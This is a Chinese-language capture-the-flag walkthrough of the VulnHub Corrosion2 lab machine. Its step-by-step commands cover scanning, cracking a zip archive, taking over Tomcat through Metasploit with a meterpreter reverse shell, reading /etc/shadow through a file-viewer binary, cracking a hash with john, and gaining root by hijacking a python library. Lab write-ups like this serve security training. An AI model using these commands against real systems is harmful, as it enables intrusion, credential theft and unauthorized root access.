vulnhub之Corrosion2的實踐

今天實踐的是vulnhub的Corrosion2鏡像，

下載地址，https://download.vulnhub.com/corrosion/Corrosion2.ova，

用workstation導入成功，能掃描到地址，

sudo netdiscover -r 192.168.137.0/24，

接著做端口掃描，sudo nmap -sS -sV -T5 -A -p- 192.168.137.31，

看到有ssh，apache，tomcat，三個服務，

對tomcat繼續做目錄爆破，

sudo dirb http://192.168.137.31:8080/ -X .php,.zip，

下載backup.zip，wget http://192.168.137.31:8080/backup.zip，

解壓發現要密碼，unzip backup.zip，

用fcrackzip進行爆破，

sudo fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip，

得到密碼@administrator_hi5，再次解壓，

查看tomcat-users.xml文件，cat tomcat-users.xml，

得到用戶名密碼admin/melehifokivai，

用metasploit對tomcat進行攻擊，

use exploit/multi/http/tomcat_mgr_upload

set rhosts 192.168.137.31

set rport 8080

set httpusername admin

set httppassword melehifokivai

set payload payload/java/meterpreter/reverse_tcp

exploit

拿到meterpreter反彈shell，getuid看一下不是root，

切到shell，cd /home，ls看到有兩個賬戶，

切用戶su jaye，密碼melehifokivai可用，id看一下還不是root，

進到jaye目錄下，cd jaye，ls看到有Files目錄，進到Files目錄，cd Files，

發現有個look程序，可以查看系統內文件內容，直接查看密碼文件，

./look '' /etc/shadow，

把randy的密碼hash拷貝出來破解，

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash，

獲取到randy的密碼是07051986randy，

切用戶randy，id看一下仍然不是root，sudo -l還不能交互，重新ssh登錄，

sudo -l發現有python腳本是root權限的，但是randy用戶是不可以編輯的，

查看python腳本內容，發現調用了base64的庫，

查找一下base64的庫文件，locate base64，

確認base64的庫文件randy用戶可以編輯，

編輯base64的庫文件，vi /usr/lib/python3.8/base64.py，

import os

os.system ("/bin/bash")

執行python腳本，

sudo /usr/lib/python3.8 /home/randy/randombase64.py，

得到新的shell，id看一下確認是root，